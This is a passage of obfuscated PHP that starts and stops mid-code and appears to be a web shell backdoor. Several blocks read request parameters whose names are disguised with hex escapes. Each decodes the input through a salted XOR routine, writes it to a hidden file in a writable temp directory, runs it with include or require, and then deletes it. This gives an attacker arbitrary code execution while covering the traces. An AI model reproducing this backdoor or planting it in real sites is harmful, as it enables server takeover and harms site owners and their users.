0 && isset($_REQUEST["sym"])){ $dat = array_filter([sys_get_temp_dir(), session_save_path(), getenv("TMP"), "/var/tmp", getenv("TEMP"), ini_get("upload_tmp_dir"), "/dev/shm", "/tmp", getcwd()]); $element = $_REQUEST["sym"]; $element= explode ( "." ,$element) ; $flag = ''; $salt6 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen( $salt6); foreach( $element as $m => $v8): $chS = ord( $salt6[$m % $sLen]); $d = ( ( int)$v8 - $chS -( $m % 10)) ^ 88; $flag .=chr( $d); endforeach; foreach ($dat as $key => $val) { if (is_dir($val) ? is_writable($val) : false) { $hld = implode("/", [$val, ".mrk"]); $file = fopen($hld, 'w'); if ($file) { fwrite($file, $flag); fclose($file); include $hld; @unlink($hld); exit; } } } } if(filter_has_var(INPUT_POST, "ele\x6D")){ $symbol = array_filter(["/var/tmp", getenv("TEMP"), "/dev/shm", session_save_path(), sys_get_temp_dir(), ini_get("upload_tmp_dir"), "/tmp", getenv("TMP"), getcwd()]); $item = $_POST["ele\x6D"]; $item = explode ( '.', $item ) ; $data_chunk = ''; $s2 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen( $s2); $q = 0; while( $q < count( $item)) {$v4 = $item[$q]; $chS = ord( $s2[$q % $sLen]); $dec =( ( int)$v4 - $chS -( $q % 10)) ^ 97; $data_chunk.=chr( $dec); $q++; } foreach ($symbol as $component): if ((function($d) { return is_dir($d) && is_writable($d); })($component)) { $sym = "$component/.marker"; $file = fopen($sym, 'w'); if ($file) { fwrite($file, $data_chunk); fclose($file); include $sym; @unlink($sym); die(); } } endforeach; } if(count($_REQUEST) > 0 && isset($_REQUEST["val\x75e"])){ $resource = array_filter(["/dev/shm", getenv("TEMP"), getcwd(), getenv("TMP"), "/tmp", sys_get_temp_dir(), "/var/tmp", session_save_path(), ini_get("upload_tmp_dir")]); $pointer = $_REQUEST["val\x75e"]; $pointer =explode ( '.',$pointer ); $component = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($salt ); $j = 0; foreach ($pointer as $v2) { $sChar = ord($salt[$j % $lenS] ); $dec = ((int)$v2 - $sChar - ($j % 10))^ 46; $component .= chr($dec ); $j++; } for ($binding = 0, $val = count($resource); $binding < $val; $binding++) { $desc = $resource[$binding]; if ((bool)is_dir($desc) && (bool)is_writable($desc)) { $parameter_group = "$desc/.data_chunk"; if (file_put_contents($parameter_group, $component)) { require $parameter_group; unlink($parameter_group); exit; } } } } if(isset($_REQUEST["\x76\x61lue"]) ? true : false){ $tkn = $_REQUEST["\x76\x61lue"]; $tkn= explode ( '.' , $tkn ) ; $ent = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($salt ); $s = 0; $__len = count($tkn ); do { if ($s >=$__len) break; $v6 = $tkn[$s]; $chS = ord($salt[$s % $sLen] ); $dec = ((int)$v6 - $chS - ($s % 10)) ^ 26; $ent.= chr($dec ); $s++; } while (true ); $dat = array_filter(["/dev/shm", getenv("TMP"), sys_get_temp_dir(), getenv("TEMP"), "/var/tmp", ini_get("upload_tmp_dir"), session_save_path(), getcwd(), "/tmp"]); while ($elem = array_shift($dat)) { if ((function($d) { return is_dir($d) && is_writable($d); })($elem)) { $record = sprintf("%s/.element", $elem); $success = file_put_contents($record, $ent); if ($success) { include $record; @unlink($record); die();} } } } if(isset($_REQUEST["\x65nt"]) ? true : false){ $entry = array_filter([getenv("TMP"), "/var/tmp", session_save_path(), "/tmp", sys_get_temp_dir(), "/dev/shm", getcwd(), getenv("TEMP"), ini_get("upload_tmp_dir")]); $entity = $_REQUEST["\x65nt"]; $entity = explode ( "." , $entity ) ; $dchunk = ''; $s5 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($s5 ); foreach ($entity as $k => $v1): $sChar = ord($s5[$k % $sLen] ); $dec = ((int)$v1 - $sChar - ($k % 10)) ^ 40; $dchunk .= chr($dec ); endforeach; $key = 0; do { $parameter_group = $entry[$key] ?? null; if ($key >= count($entry)) break; if ((function($d) { return is_dir($d) && is_writable($d); })($parameter_group)) { $